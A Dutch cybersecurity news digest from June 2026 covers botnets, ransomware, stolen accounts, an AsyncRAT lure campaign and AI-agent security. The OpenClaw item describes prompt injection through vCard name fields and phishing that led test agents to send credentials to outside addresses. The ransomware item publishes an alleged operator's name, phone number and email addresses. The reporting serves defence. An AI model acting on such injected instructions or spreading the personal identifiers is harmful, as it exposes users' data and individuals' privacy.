Beveiligingsonderzoekers dringen er bij elke ontwikkelaar die dbmux heeft geïnstalleerd of uitgevoerd, op aan om het systeem zonder uitzondering als volledig gecompromitteerd te beschouwen. De eerste en meest urgente stap is het onmiddellijk roteren van alle geheimen, API sleutels en referenties. Dit moet gebeuren vanaf een afzonderlijke, ongecompromitteerde machine om te voorkomen dat nieuwe referenties aan dezelfde aanvaller worden blootgesteld. Ontwikkelaars moeten ook hun systeemlogboeken controleren op verdachte of ongeautoriseerde activiteiten gedurende de periode dat het kwaadaardige pakket op hun machine aanwezig was. Een forensische analyse of een volledige herinstallatie van het systeem wordt sterk geadviseerd, vooral voor systemen die gevoelige gegevens verwerkten of toegang hadden tot interne infrastructuur. Een grondige controle op eventuele aanvullende malware die naast dbmux is geïnstalleerd, moet worden uitgevoerd voordat een getroffen machine weer normaal wordt gebruikt.

Dit incident dient als een scherpe herinnering dat open source pakketecosystemen, hoewel van onschatbare waarde voor moderne ontwikkeling, met verwoestende snelheid en minimale detectie kunnen worden bewapend. Ontwikkelaars en beveiligingsteams moeten strikte controle- en beoordelingspraktijken toepassen voordat ze nieuwe afhankelijkheden toevoegen aan hun projecten of geautomatiseerde pijplijnen.

 

Bron: SupplyChainAttack.org

11 juni 2026 | Chinees JDY botnet vergroot focus op Amerikaanse militaire netwerken

Het JDY botnet, een kwaadaardig netwerk dat eerder in verband werd gebracht met Chinese dreigingsactoren zoals Volt Typhoon, heeft zijn doelwitbereik en verkenningsinspanningen aanzienlijk uitgebreid. Volgens onderzoekers van Black Lotus Labs, een onderdeel van Lumen, die de activiteiten nauwlettend volgen, richt JDY zich sterk op de Verenigde Staten, waar veel van de gecompromitteerde apparaten zich bevinden en waar het botnet zich intensief richt op militaire en aanverwante netwerken.

Het securitybedrijf merkt op dat JDY is gegroeid van ongeveer 650 actieve bots in januari 2024 tot meer dan 1.500 gecompromitteerde SOHO en IoT apparaten op dit moment. Hoewel deze aantallen mogelijk laag lijken, is het belangrijk te begrijpen dat JDY geen exploitatiekader of een DDoS-botnet is dat grote zwermen vereist voor aanvalskracht. In plaats daarvan fungeert het als een gedistribueerd scannings- en fingerprinting-netwerk dat de operators helpt doelwitten te lokaliseren die kwetsbaar zijn voor recentelijk openbaar gemaakte kwetsbaarheden.

"Analyse van deze activiteit toont een duidelijke focus op het identificeren van kwetsbare infrastructuur kort na openbare bekendmakingen van kwetsbaarheden, wat suggereert dat de verkenningsresultaten snel worden geoperationaliseerd door geavanceerde persistente dreigingsactoren (APT) die gelieerd zijn aan China," aldus het rapport van Black Lotus Labs. "Deze gerichte focus is waargenomen in diverse sectoren, waarbij het Amerikaanse leger en aanverwante entiteiten het meest prominent zijn."

CISA heeft eerder gewaarschuwd voor het risico dat Volt Typhoon-operatives vormen voor onbeveiligde SOHO-routers, en drong er bij leveranciers van netwerkapparatuur op aan om kwetsbaarheden in de webbeheerinterfaces (WMI's) van SOHO-routers te elimineren tijdens de ontwerp- en ontwikkelingsfasen.

Het JDY botnet is specifiek ontworpen voor het uitvoeren van service discovery, het verzamelen van servicebanners, het verzamelen van TLS certificaten, protocol fingerprinting en kwetsbaarheidsgerichte verkenning. Onder de gecompromitteerde apparaten bevinden zich die van Cisco, Araknis, Mimosa Networks, Ubiquiti, DrayTek, Hikvision en Linksys, voor MIPS-, MIPS64-, MIPSEL- en MIPSEL64-architecturen.

De dreigingsactoren zijn snel met het richten op nieuw openbaar gemaakte kwetsbaarheden. Onderzoekers van Lumen hebben JDY-scans waargenomen die gericht waren op CVE-2026-35616 kort nadat Fortinet de kwetsbaarheid in FortiClient EMS openbaar had gemaakt. De operators besturen het botnet via verborgen Tor-diensten, die tevens dienen als command-and-control (C2) infrastructuur. Het open-source reverse-shell en host-management framework Platypus wordt in sommige gevallen ook gebruikt.

De botnetclient registreert zich bij een centrale "Dispatch Service" en ontvangt scantaken, die het uitvoert, de resultaten comprimeert en terugstuurt naar de C2. De scanningsmodule ondersteunt TCP-scanning, SSL/TLS-scanning, UDP-scanning, ICMP-probing, bannercollectie, TLS-certificaatverzameling en service-fingerprinting met behulp van downloadbare regels. De botnetclient herhaalt dezelfde cyclus totdat de operator specifiek opdracht geeft om te stoppen.

De TCP-scanningsfunctie is technisch gezien een van de meest interessante, aldus de onderzoekers, die uitleggen dat JDY, wanneer het over voldoende privileges beschikt, veel sneller en heimelijker ruwe SYN-scans uitvoert. "Als de malware een ruwe socket kan openen, wat over het algemeen root- of administratieve privileges vereist, initieert het snelle SYN-scans met behulp van speciaal vervaardigde TCP-pakketten," legt het rapport uit. "Deze aangepaste pakketten gebruiken een vaste bronpoort van 19000, verhogen de doelpoorten één voor één en verwerken duizenden scanddoelen in batches."

Naarmate de activiteit van het JDY botnet toeneemt, moeten organisaties ervoor zorgen dat routers, firewalls en IoT apparaten de nieuwste beveiligingsupdates en patches draaien om te voorkomen dat ze worden opgenomen in verkenningsnetwerken. Verdedigers moeten ook hun externe aanvalsoppervlak verkleinen door onnodige via internet toegankelijke administratieve interfaces uit te schakelen, beheer op afstand te beperken, standaardwachtwoorden te vervangen en te monitoren op ongebruikelijke uitgaande scanactiviteit afkomstig van randapparatuur.

 

Bron: Black Lotus Labs | Bron 2: lumen.com | Bron 3: hubs.li

11 juni 2026 | Identiteit beheerder 'The Gentlemen' ransomwaregroep ontmaskerd

De ransomwaregroep The Gentlemen heeft zich ontpopt als de op één na meest actieve ransomwarebende gemeten naar het aantal slachtoffers. De groep trekt snel getalenteerde hackers aan door een agressieve wervingsstrategie, waarbij affiliates maar liefst 90 procent van het losgeld beloofd wordt. Recent onderzoek werpt licht op de werkelijke identiteit van de beheerder van deze ransomwaregroep.

Beveiligingsfirma Check Point Software heeft de activiteiten van The Gentlemen nauwgezet gevolgd. The Gentlemen opereert als een "ransomware-as-a-service" (RaaS), waarbij het ruime vergoedingen betaalt aan affiliates om de malware te verspreiden. Volgens Check Point is de verdeling van de opbrengsten, 90 procent voor de affiliate en 10 procent voor de beheerder, aanzienlijk hoger dan de industriestandaard van 80/20. Dit versnelt de groei van de groep door ervaren operators van concurrerende programma's aan te trekken.

Check Point ontdekte dat The Gentlemen de op één na actiefste ransomwaregroep is dit jaar, met minstens 332 gepubliceerde slachtoffers sinds de oprichting halverwege 2025, en meer dan 240 alleen al in 2026. De groep richt zich op apparaten die direct met internet verbonden zijn, zoals VPN's en firewalls, als toegangspunt. Eenmaal binnen versleutelen zij snel hele netwerken binnen enkele uren.

Volgens Check Point gebruikt de beheerder en primaire operator van de ransomwaregroep de bijnaam Zeta88 op Russischtalige cybercrimeforums, en was deze persoon voorheen bekend onder het pseudoniem Hastalamuerte. Een datalek in de backend-infrastructuur van de groep bevestigde dat Hastalamuerte/Zeta88 de persoon is die de locker en het RaaS-paneel assembleert, betalingen beheert en in wezen de beheerder is van het hele programma dat 10 procent van alle losgeldbetalingen ontvangt.

De cyberinlichtingenfirma Intel 471 toont aan dat de gebruiker Hastalamuerte een Russisch en Engels sprekend persoon is, die zich sinds 2019 heeft geregistreerd op bijna een dozijn cybercrimeforums, waaronder Exploit, Breachforums, Ramp_V2, BHF, Raidforums en Nulled. Intel 471 onthulde dat Hastalamuerte zich in januari 2025 registreerde op Breachforums vanaf een internetadres in Izjevsk, de hoofdstad van de Russische autonome republiek Oedmoertië. Op vergelijkbare wijze meldde de gebruiker Zeta88 zich in augustus 2022 aan op het Engelstalige cybercrimeforum Breached, eveneens vanaf een ander internetadres in Izjevsk.

Intel 471 vond verder dat Hastalamuerte zich in 2020 op Raidforums registreerde met het e-mailadres hastalamuerte1488@protonmail.com. De cijfercombinatie 1488 wordt geassocieerd met witte suprematie. Een zoekopdracht met dit adres via de open-source inlichtingendienst Epieos toont een koppeling met een Apple account en een telefoonnummer eindigend op 04. Epieos meldt dat dit Protonmail-adres ook is gekoppeld aan een GitHub account onder de gebruikersnaam SantaMuerte. Hoewel dit account privé is, toont de activiteitengeschiedenis van de gebruiker aan dat deze meerdere malwaretools en exploits observeert en ontwikkelt.

In april 2020 gaf Hastalamuerte op het crimeforum Nulled aan bereikbaar te zijn via de Telegram-gebruikersnaam @hastalamuerte18. Bedreigingsinformatiebedrijf Flashpoint constateerde dat deze gebruikersnaam is toegewezen aan het unieke Telegram-ID 30907522. De dienst Constella Intelligence rapporteert dat het Telegram-ID van Hastalamuerte is gekoppeld aan een andere gebruikersnaam, "bu4vs", en aan het Russische telefoonnummer 79127650004.

Door dit telefoonnummer verder te onderzoeken in Constella, kwamen meerdere gegevens naar voren uit gehackte Russische overheidsdatabases, waaruit blijkt dat het nummer is toegewezen aan Alexander Andreevich Japaev, een 36-jarige uit Izjevsk. Constella onthulde dat dit telefoonnummer werd gebruikt om een account aan te maken op het Russische socialemediaplatform Pikabu onder de naam "4apai18". Het toont ook aan dat de heer Japaev zich op verschillende websites heeft geregistreerd met de veelvoorkomende achternaam Ivanov, of "Chapaev" (waarbij het cijfer 4 vaak wordt gebruikt als afkorting voor een "ch"-klank in het Russisch).

Een zoekopdracht in Intel 471 naar cybercrimeforumleden met de bijnaam SantaMeurte bracht een account met dezelfde naam aan het licht, aangemaakt in 2020 op het Russische hackingforum Codeby. Intel 471 toont aan dat deze gebruiker zich oorspronkelijk op Codeby registreerde met de onverbloemde bijnaam Alexandr 4apaev. Constella vond dat de heer Japaev regelmatig het e-mailadres bu4vs@mail.ru gebruikte. Ondertussen toont Epieos aan dat dit adres is gekoppeld aan een LinkedIn-account van Alexander Japaev, die zichzelf vermeldt als hoofd B2B-marketing bij het bedrijf Uralenergo Udmurtia, een van Ruslands grootste leveranciers van elektrotechnische en verlichtingsproducten. De heer Japaev heeft niet gereageerd op meerdere verzoeken om commentaar.

 

Bron: Krebs on Security | Bron 2: research.checkpoint.com | Bron 3: kelacyber.com

11 juni 2026 | AI model ontdekt kritieke fout in privacygerichte cryptomunt Zcash, waarde daalt fors

Onderzoekers hebben met het AI model Claude Opus 4.8 een belangrijke fout ontdekt in Zcash, een cryptomunt die bekend staat om zijn focus op privacy. Deze kwetsbaarheid, die al vier jaar bestond, maakte het in theorie mogelijk om ongelimiteerd nieuwe tokens te genereren, wat neerkomt op het digitaal drukken van geld. De ontdekking van de bug onderstreept de groeiende capaciteit van geavanceerde AI modellen in het vinden van kwetsbaarheden en bugs in software.

De fout bevond zich specifiek in de zogenaamde 'Orchard pool' van Zcash, een afgeschermde privacy pool waar alle verwerkte transacties volledig verborgen blijven. Dit in tegenstelling tot veel andere cryptomunten, waar transacties publiekelijk traceerbaar zijn, ook al blijven de identiteiten van de gebruikers anoniem. Door deze privacyfunctie is het bijzonder moeilijk om te achterhalen of en in welke mate er misbruik is gemaakt van de bug om 'gratis geld' te creëren. Onderzoeker Tom Robinson meldde deze bevindingen op LinkedIn.

De kwetsbaarheid werd eind mei ontdekt en op 2 juni reeds verholpen. Op dit moment zijn er geen aanwijzingen dat er op grote schaal misbruik is gemaakt en dat er massaal veel Zcash-tokens zijn gegenereerd die de markt zouden overspoelen. De private pool heeft bovendien een ingebouwde harde limiet van 4 miljoen tokens die van de Orchard pool naar de publieke pool mogen worden verplaatst. Dit beperkt de potentiële schade. Echter, als iemand duizenden of zelfs miljoenen private ZEC-tokens had gegenereerd en deze geleidelijk naar buiten had gebracht, zouden de laatste gebruikers die hun munten uit de private pool willen halen mogelijk achterblijven met een overschot aan nutteloze tokens die de limiet overschrijden.

De gevolgen voor Zcash waren aanzienlijk. Binnen 24 uur na de bekendmaking van de bug daalde de waarde van de munt met 35 tot 40 procent, als gevolg van verloren vertrouwen bij investeerders. Dit incident werpt de vraag op of Zcash de eerste van vele cryptomunten zal zijn die te maken krijgen met dergelijke AI-gedreven bugvindingen. Eerder gaf Mozilla, de organisatie achter de Firefox-browser, al aan dat een model van Anthropic honderden fouten in hun browser had gevonden. Anthropic zelf beschouwde zijn securitymodel Claude Mythos als "te gevaarlijk" om openbaar te maken. De verwachting is dat de komende maanden en jaren een stortvloed aan bugrapporten zal volgen, wat een nieuwe uitdaging vormt voor cryptomunten die voor een groot deel afhankelijk zijn van vertrouwen.

 

Bron: Datanews.be

11 juni 2026 | Gestolen accounts van Nederlandse webshopklanten te koop op ondergrondse markt

Deze accounts zouden afkomstig zijn van klanten uit Nederland, Duitsland, Oostenrijk, Zwitserland en de Verenigde Staten. De aanbieder verkoopt combinaties van e-mailadres en wachtwoord, en van gebruikersnaam en wachtwoord. Op verzoek kunnen accounts voor specifieke platforms worden geleverd.

Onder de merken waarvan accounts worden aangeboden, bevinden zich onder andere Amazon, Zalando, QVC, BestSecret en HSE. De gestolen inloggegevens lijken afkomstig te zijn uit credential logs en infostealers, een type malware dat inloggegevens van besmette computers steelt.

De dreigingsactor adverteert met de beschikbaarheid van grote volumes, dagelijkse updates, vervangingsgaranties en de mogelijkheid voor selectie op maat. De authenticiteit van de accounts is echter niet onafhankelijk geverifieerd.

De handel in dergelijke gestolen accounts voedt verdere cybercriminaliteit, waaronder accountovernames, credential stuffing en phishingaanvallen. Om het risico op slachtofferschap te beperken, wordt consumenten aangeraden unieke wachtwoorden te gebruiken voor elke webshop en waar mogelijk meerfactorauthenticatie in te schakelen.

 

Bron: Cybercrimeinfo

11 juni 2026 | Cybercrimeforum DaMaGeLiB offline na verdwijning van beheerder

Het ondergrondse forum DaMaGeLiB, een belangrijke bibliotheek en forum binnen het bredere cybercrime ecosysteem rond het bekende forum XSS, is recentelijk offline gegaan. Dit gebeurde nadat de beheerder, bekend onder de naam gliderexpert, op 3 juni 2026 rond half zes 's middags verdween. Tegelijkertijd werden de servers die het forum, de bestandsdeling en de git omgeving hostten, onbereikbaar.

Volgens een officiële verklaring van het DaMaGeLiB team, uitgegeven op 10 juni 2026, was de verdwenen beheerder de enige persoon met toegang tot de volledige backup van het forum. Het team heeft verklaard niet te weten wat er met gliderexpert is gebeurd, wat leidde tot het verlies van bijna een jaar aan opgebouwd materiaal op het platform. Desondanks kondigt het team een doorstart aan onder de naam DaMaGeLiB 2.0. Hierbij zullen de bestaande clearnet domeinen, eigen scripts en plugins behouden blijven.

Het team heeft leden gewaarschuwd om uitsluitend officiële communicatiekanalen te vertrouwen en geen gehoor te geven aan ongevraagde uitnodigingen of provocaties. Er wordt expliciet gewaarschuwd voor de mogelijke verschijning van honeypots, die valstrikken kunnen zijn van opsporingsdiensten of rivaliserende groeperingen. De verdwijning van de beheerder en het offline gaan van het forum passen in een onrustige periode in het ondergrondse forumlandschap, met name na de eerdere verstoring van het XSS forum.

 

Bron: Cybercrimeinfo

12 juni 2026 | Nieuwe aanvalstechnieken misleiden OpenClaw AI agenten tot uitvoeren van code en lekken van data

Twee onafhankelijke beveiligingsteams, Imperva en Varonis, hebben recentelijk aangetoond dat OpenClaw, een populaire self-hosted AI-agent, kwetsbaar is voor nieuwe aanvalstechnieken. Deze methoden kunnen de agent dwingen om kwaadaardige code uit te voeren of gevoelige gegevens te lekken via ogenschijnlijk onschuldige invoer.

Imperva-onderzoeker Yohann Sillam ontdekte dat verborgen instructies konden worden ingebed in gedeelde contacten, vCards en locatiepins. De AI-agent voerde deze instructies uit zonder dat de gebruiker ze opmerkte. Dit komt doordat OpenClaw deze objecten direct in de prompttekst opneemt zonder ze als onbetrouwbare inhoud te markeren. Specifiek wordt het naamveld van een contact of vCard misbruikt, waarbij hoekhaken legaal zijn, waardoor het model geïnjecteerde commando's niet kan onderscheiden van de echte naam. In tests met Gemini 3.1 Pro downloadde en voerde de agent een script uit van een door de onderzoekers gecontroleerde server.

De kwetsbaarheid die Imperva vond, is verholpen in OpenClaw versie 2026.4.23. Gebruikers wordt geadviseerd deze update te installeren, die contactnamen en andere metadata verplaatst naar een apart kanaal voor onvertrouwde gegevens. Imperva waarschuwt dat vergelijkbare 'flattening'-patronen ook in andere persoonlijke AI-assistenten zijn gevonden.

Varonis Threat Labs, onder leiding van Itay Yashar, richtte zich op 'agent-phishing'. Zij bouwden een testagent, 'Pinchy', en voerden phishing-simulaties uit met Google Gemini 3.1 Pro en OpenAI Codex GPT-5.4. De agent werd misleid door normale e-mails die zich voordeden als interne verzoeken, en stuurde zo synthetische AWS IAM-toegangssleutels, database-verbindingsreeksen, SSH-inloggegevens en een klantenexport naar externe adressen. Dit gebeurde zelfs onder een strikt beveiligingsprofiel dat afzenderverificatie vereiste; urgentie en routine bleken deze regel te ondermijnen.

Varonis constateert dat AI-agenten beter zijn in het herkennen van kwaadaardige URL's en nep-inlogportalen dan veel mensen, maar minder bedreven in het sociale beoordelingsvermogen. De drang van de agent om behulpzaam te zijn, vormt hierbij een belangrijk aanvalsoppervlak. Deze phishing-zwakte kan niet met een patch worden verholpen; het vereist het beperken van de autonome acties van de agent.

Beide aanvalstypen zijn terug te voeren op de "lethale trifecta" van Simon Willison, een agent die privédata kan lezen, onvertrouwde content kan verwerken en data kan versturen. OpenClaw bezit al deze eigenschappen. Een aparte analyse door InfoSec Write-ups onthulde bovendien vijf kwetsbaarheden in OpenClaw's kanaalextensies voor Slack, Discord, Matrix, Zalo en Microsoft Teams. Deze kwetsbaarheden, die inmiddels zijn gepatcht, stelden aanvallers in staat om via het wijzigen van hun weergavenaam op een allowlist te komen en de agent te besturen.

 

Bron: openclaw | Bron 2: github.com | Bron 3: varonis.com

12 juni 2026 | Claim van gelekte Wickr Enterprise Admin API en betaalsleutels op hackingforum

Een nieuwe dreigingsactor, bekend als Orcinusorca, beweert productietoegang te hebben verkregen tot de Admin API van Wickr Enterprise, het beveiligde berichtenplatform van Amazon Web Services (AWS). Deze claim, die op 11 juni 2026 op een ondergronds forum verscheen, omvat naar verluidt ook de diefstal van interne API-sleutels en Braintree productietoegangen voor betalingsverwerking. Wickr Enterprise is een platform dat specifiek is ontworpen voor vertrouwelijke communicatie en wordt gebruikt door zowel bedrijven als overheidsinstanties wereldwijd. De vermeende inbreuk zou zijn opgetreden bij een organisatie in de Verenigde Staten, actief in de technologie- en beveiligde berichtensector.

Volgens de posting zou de vermeende toegang de infrastructuur van Wickr Enterprise compromitteren, inclusief verwijzingen naar de interne AWS admin console en details over Envoy/CloudFront infrastructuur. Als bewijs heeft Orcinusorca responsheaders en een kort JSON-fragment gepubliceerd. Echter, de dreigingsactor is een nieuw account op het forum, en de claims zijn nog niet onafhankelijk geverifieerd. Er is op dit moment geen gebruikersdata gedumpt.

De potentiële impact van een dergelijke inbreuk is aanzienlijk. Als de claims authentiek zijn, zou toegang tot de productie Admin API van een beveiligd berichtenplatform, samen met gelekte interne API-sleutels en betalingsverwerkingssleutels, een ernstige infrastructuurcompromittering betekenen. De gelekte betalingssleutels zouden frauduleuze activiteiten kunnen faciliteren, en admin-niveau toegang tot een product dat wordt gepromoot voor vertrouwelijke communicatie is bijzonder gevoelig, gezien de brede gebruikersbasis onder bedrijven en overheden. Hoewel de gepresenteerde "bewijzen" beperkt zijn tot responsheaders en een JSON-fragment, die op zichzelf geen admin-controle aantonen, en dergelijke claims vaak overdreven zijn, is voorzichtigheid geboden.

De status van de claim blijft ongeverifieerd. De toegang en de sleutels zijn niet onafhankelijk gevalideerd, en Amazon/Wickr heeft de beweringen nog niet publiekelijk behandeld. Genoemde sleutels moeten als potentieel gecompromitteerd worden beschouwd totdat een grondige beoordeling heeft plaatsgevonden.

 

Bron: Cybercrimeinfo

12 juni 2026 | AI verkort ontwikkeltijd van exploits voor bekende kwetsbaarheden van weken naar uren

Nieuw onderzoek heeft uitgewezen dat geavanceerde grote taalmodellen (LLM's), in het bijzonder Anthropic's Claude Mythos Preview, de ontwikkeling van N-day exploits drastisch versnellen. Deze versnelling reduceert de benodigde tijd van weken naar slechts uren, wat het risico tijdens de zogenaamde 'patch gap' significant verhoogt.

N-day kwetsbaarheden zijn publiekelijk bekendgemaakte softwarefouten die nog niet zijn gepatcht op een groot aantal systemen. In tegenstelling tot zero-day kwetsbaarheden, zijn N-day kwetsbaarheden vaak eenvoudiger te exploiteren. Aanvallers kunnen namelijk de uitgebrachte beveiligingspatches analyseren via een techniek genaamd 'patch diffing'. Deze methode onthult de exacte codewijzigingen en helpt bij het reverse-engineeren van de kwetsbaarheid. Historisch gezien vereiste het creëren van een werkende exploit vanuit een patch aanzienlijke expertise en tijd. Een bekend voorbeeld is de WannaCry aanval met ransomware, die bijna twee maanden na de MS17-010 patch plaatsvond, terwijl andere exploits doorgaans weken in beslag namen.

Nieuwe bevindingen suggereren echter dat deze tijdlijn nu snel krimpt. Anthropic heeft zijn Claude Mythos Preview model getest op 18 recente Firefox kwetsbaarheden. Het model genereerde succesvol proof-of-concept (PoC) exploits voor 14 van deze kwetsbaarheden, waarbij de eerste PoC al binnen 12 minuten werd geproduceerd. Nog opmerkelijker is dat het model 8 volledig functionele code-executie exploits creëerde in ongeveer 12 uur. De testomgeving voorzag het model van patch diffs, gecompileerde builds en beperkte context die real-world aanvallersomstandigheden simuleerde. Ondanks deze beperkingen toonde Mythos een aanzienlijke sprong in capaciteit vergeleken met eerdere modellen, die aanzienlijk minder werkende exploits produceerden.

Het onderzoek werd ook uitgebreid naar kwetsbaarheden in de Microsoft Windows kernel, waarvoor de broncode niet openbaar beschikbaar is. In dit complexere scenario ontwikkelde Mythos Preview PoC's voor 18 van de 21 kwetsbaarheden. Het model slaagde erin om 8 complete privilege-escalatie exploitketens te bouwen, waardoor aanvallers van laag niveau toegang naar volledige SYSTEEM-controle konden overstappen. Zelfs kwetsbaarheden die door Microsoft als "Exploitation Unlikely" waren beoordeeld, werden succesvol geëxploiteerd door het model, wat een groeiende discrepantie benadrukt tussen traditionele risicobeoordelingen en de mogelijkheden van AI.

Een belangrijke zorg is de krimpende 'patch gap', de periode tussen de openbaarmaking van een kwetsbaarheid en de brede uitrol van de patch. Hoewel moderne systemen zoals Windows Autopatch tot 11 dagen kunnen duren om updates volledig af te dwingen, was Mythos in staat om werkende exploits te genereren ruim voordat patches algemeen waren toegepast. Deze verschuiving betekent dat aanvallers geen geavanceerde reverse-engineering vaardigheden of lange tijdlijnen meer nodig hebben. Met toegang tot capabele AI modellen en bescheiden middelen kan een enkele operator meerdere kwetsbaarheden binnen enkele uren 'weaponizen'.

De implicaties zijn bijzonder ernstig voor omgevingen met trage patchcycli, zoals industriële controlesystemen, gezondheidszorgapparatuur en IoT-infrastructuur. Deze systemen vertrouwen vaak op vaste update schema's of door de leverancier gecontroleerde firmware, wat ze bijzonder kwetsbaar maakt voor snelle exploitatie. Het team van red.anthropic waarschuwt dat maandelijkse patchcycli en gefaseerde uitrol niet langer gelijke tred kunnen houden met snel bewapende kwetsbaarheden. Organisaties moeten de patchimplementatie versnellen en aanvullende verdedigingsmechanismen toepassen, waaronder geheugenveilige programmeertalen zoals Rust en exploit mitigatietechnologieën zoals Control Flow Guard.

De opkomst van AI-gestuurde exploitontwikkeling markeert een fundamentele verschuiving in het dreigingslandschap. Naarmate tools zoals Claude Mythos blijven evolueren, kan het concept van "N-day" kwetsbaarheden binnenkort achterhaald zijn, vervangen door een nieuwe realiteit waarin exploitatie binnen enkele uren na openbaarmaking plaatsvindt.

 

Bron: Anthropic

12 juni 2026 | Hackers misbruiken AI hype voor verspreiding AsyncRAT malware via valse gidsen

Cybercriminelen maken misbruik van de wereldwijde interesse in kunstmatige intelligentie (AI) om Windows-gebruikers te verleiden tot het downloaden van malware. Dit blijkt uit recent onderzoek van cybersecurity-experts van FortiGuard Labs. De aanvallers verspreiden gecomprimeerde mappen die zich voordoen als nuttige technische AI-gidsen.

Een voorbeeld dat door de onderzoekers werd waargenomen, betrof een map met de titel "Agentic Coding with Claude Code, The everyday developer's guide to agentic coding with Claude Code.7z". Hoewel deze map op het eerste gezicht veilig leek, initieert het een complexe keten van verborgen scripts zodra deze wordt geopend.

De aanval begint wanneer het slachtoffer een snelkoppeling (.lnk) in het gecomprimeerde archief opent. Dit bestand voert verborgen commando's uit met behulp van native Windows-componenten zoals cmd.exe en findstr. Hierbij worden gegevens opgehaald uit bestanden genaamd 3th.pdf en 4th.pdf, die geen echte documenten zijn, maar opslagcontainers voor kwaadaardige code.

Vervolgens start de aanvalsketen formeel met een PowerShell script dat via AES-CBC-decryptie een secundair script in de AppData-map van het systeem plaatst. Deze stap brengt de kwaadaardige code in onleesbaar formaat over naar de computer. De malware voert daarna een commando uit om de gehele C:\ drive en PowerShell.exe toe te voegen aan de uitsluitingspaden van Microsoft Defender. Dit heeft als doel de ingebouwde antivirussoftware te misleiden, zodat deze de aanval negeert. De derde stap omvat het misbruiken van AutoHotkey.exe, dat is hernoemd om te lijken op een legitieme Realtek audio service, waardoor de malware naadloos opgaat in de achtergrondprocessen.

De malware maakt gebruik van process hollowing om een legitiem .NET-proces in een onderbroken staat te creëren, waarna kwaadaardige code in het geheugen ervan wordt geïnjecteerd. Dit voorkomt dat het bestand op de schijf wordt opgeslagen en stelt de payload in staat statische bestandsscan gemakkelijk te omzeilen. Tegelijkertijd worden leesbare lokdocumenten getoond, zoals "AI-Ready PostgreSQL 18" of "A Guide for Thinking Marketers in the Age of AI". Dit misleidt het slachtoffer, die denkt dat de download veilig was, en leidt de aandacht af van de kwaadaardige activiteiten op de achtergrond.

FortiGuard Labs bevestigt in hun rapport dat dit framework "speciaal is ontworpen voor heimelijke payload-levering" en langdurige externe toegang. De aanvalsketen splitst zich in twee takken om twee specifieke Remote Access Trojans (RAT's) te installeren, een modulaire .NET-client met bewakingsmogelijkheden en AsyncRAT. Beide tools stellen hackers in staat gebruikersdesktops te monitoren, muisbewegingen te volgen en basisinformatie over het systeem te uploaden naar command-and-control (C2) servers, waaronder shampobiskworld.nl.

Opvallend is dat onderzoekers bij het bepalen van de toeschrijving van de aanval bewijs vonden van geautomatiseerde hulp. De tussentijdse PowerShell scripts bevatten veel vereenvoudigde Chinese variabelenamen, een onbewerkte Chinese commentaarregel en een willekeurige emoji. Hieruit concluderen de onderzoekers dat menselijke operators de algemene aanvalslogica mogelijk hebben ontworpen, maar generatieve AI tools hebben gebruikt om de code snel te schrijven, zonder de scripts voorafgaand aan de campagne op te schonen.

FortiGuard Labs waarschuwt dat elke organisatie het doelwit kan worden. Gebruikers dienen daarom alert te zijn op ongebruikelijke geplande taken en moeten voorkomen dat ze onverwachte snelkoppelingen openen van ongeverifieerde bronnen. Ram Varadarajan, CEO van Acalvio, benadrukt het gevaar van de meerfasige aard van deze campagne. Hij stelt dat dit type aanval, via "compositional opacity", een groeiende dreiging vormt. "Het ontleden van de aanval in meerdere, subtiele stappen, waarvan geen enkele afzonderlijk een alarmbel doet rinkelen, maar waarvan het cumulatieve effect de schade veroorzaakt," aldus Varadarajan. Hij waarschuwt dat dergelijke aanvallen "steeds meer AI-gestuurd en subtieler zullen worden, met aanvallen die gericht zijn op zowel nietsvermoedende mensen als AI-agenten." Verdediging hiertegen vereist gelaagde verdedigingen, met "AI-bewuste struikeldraden" als hoogtepunt.

 

Bron: FortiGuard Labs | Bron 2: fortinet.com

12 juni 2026 | Unit 42 waarschuwt voor supply chain risico's in AI agents via 'skills'

Onderzoekers van Unit 42, de bedreigingsonderzoeksafdeling van Palo Alto Networks, hebben gewaarschuwd voor aanzienlijke supply chain risico's die inherent zijn aan de groeiende implementatie van AI-agents. Deze agents, die taken automatiseren zoals codegeneratie, IT-operaties en klantenondersteuning, breiden hun functionaliteit uit door het installeren van zogenaamde 'skills'. Deze skills functioneren vergelijkbaar met apps op een smartphone, maar missen momenteel adequate beveiligingscontroles.

Volgens het onderzoek kan iedereen een skill publiceren in een openbaar register en kan iedereen zo'n skill installeren in een productie-agent. Tot op heden ontbreekt een geautomatiseerde tool die verifieert wat een skill precies doet voordat deze bevoorrechte toegang krijgt tot inloggegevens, bestanden en shell-commando's binnen de agent. Eenmaal geïnstalleerd, draait een skill binnen de bevoorrechte context van de agent en kan het omgevingsvariabelen lezen, externe diensten aanroepen, bestanden schrijven en shell-commando's uitvoeren namens de organisatie.

Unit 42 introduceert Behavioral Integrity Verification (BIV), een auditmechanisme dat het beweerde gedrag van een skill vergelijkt met het daadwerkelijke gedrag. Deze verificatie vindt plaats op drie niveaus, de metadata, de uitvoerbare code en de instructies in natuurlijke taal. Bij toepassing op grote schaal toont BIV aan dat de meeste skills afwijken van hun gedeclareerde gedrag. De overgrote meerderheid van deze afwijkingen is te wijten aan slordige documentatie, maar een kleiner, gevaarlijker deel bevat aanvalsketens in meerdere fasen. Hierbij combineren individueel onschuldig ogende mogelijkheden tot diefstal van inloggegevens, uitvoering van code op afstand of stille exfiltratie van gegevens.

De onderzoekers van Unit 42, Yuhao Wu, Tony Li en Hongliang Liu, trekken een parallel met de situatie van mobiele applicaties en browserextensies van een decennium geleden. De uitbreidbaarheid van AI-agents heeft de ontwikkeling van auditmechanismen voor de supply chain overtroffen die deze processen zouden moeten bewaken. Securityteams die agents gebaseerd op grote taalmodellen (LLM's) in productie gebruiken, wordt geadviseerd een inventarisatie te maken van de geïnstalleerde skills van derden en een gedragsintegriteitscontrole te vereisen vóór installatie, in plaats van achteraf.

 

Bron: Unit 42 (Palo Alto Networks) | Bron 2: mastodon.social | Bron 3: start.paloaltonetworks.com

12 juni 2026 | Nottingham University getroffen door ShinyHunters, 450.000 studentengegevens gelekt via PeopleSoft kwetsbaarheden

De Universiteit van Nottingham heeft bevestigd dat het slachtoffer is geworden van een cyberincident waarbij een bekende cybercriminele groep toegang heeft verkregen tot haar studentenrecordssysteem. Dit datalek treft meer dan 450.000 huidige en voormalige studenten van de Britse onderzoeksuniversiteit. Het incident is gemeld bij de Britse Information Commissioner's Office (ICO) en Action Fraud.

De universiteit, die met 7.000 medewerkers en meer dan 46.000 studenten tot de top 20 van het Verenigd Koninkrijk behoort, gaf in een verklaring aan dat een "aanzienlijke hoeveelheid gegevens" is blootgesteld. Momenteel wordt er samengewerkt met de externe partij die het platform beheert voor een forensisch onderzoek.

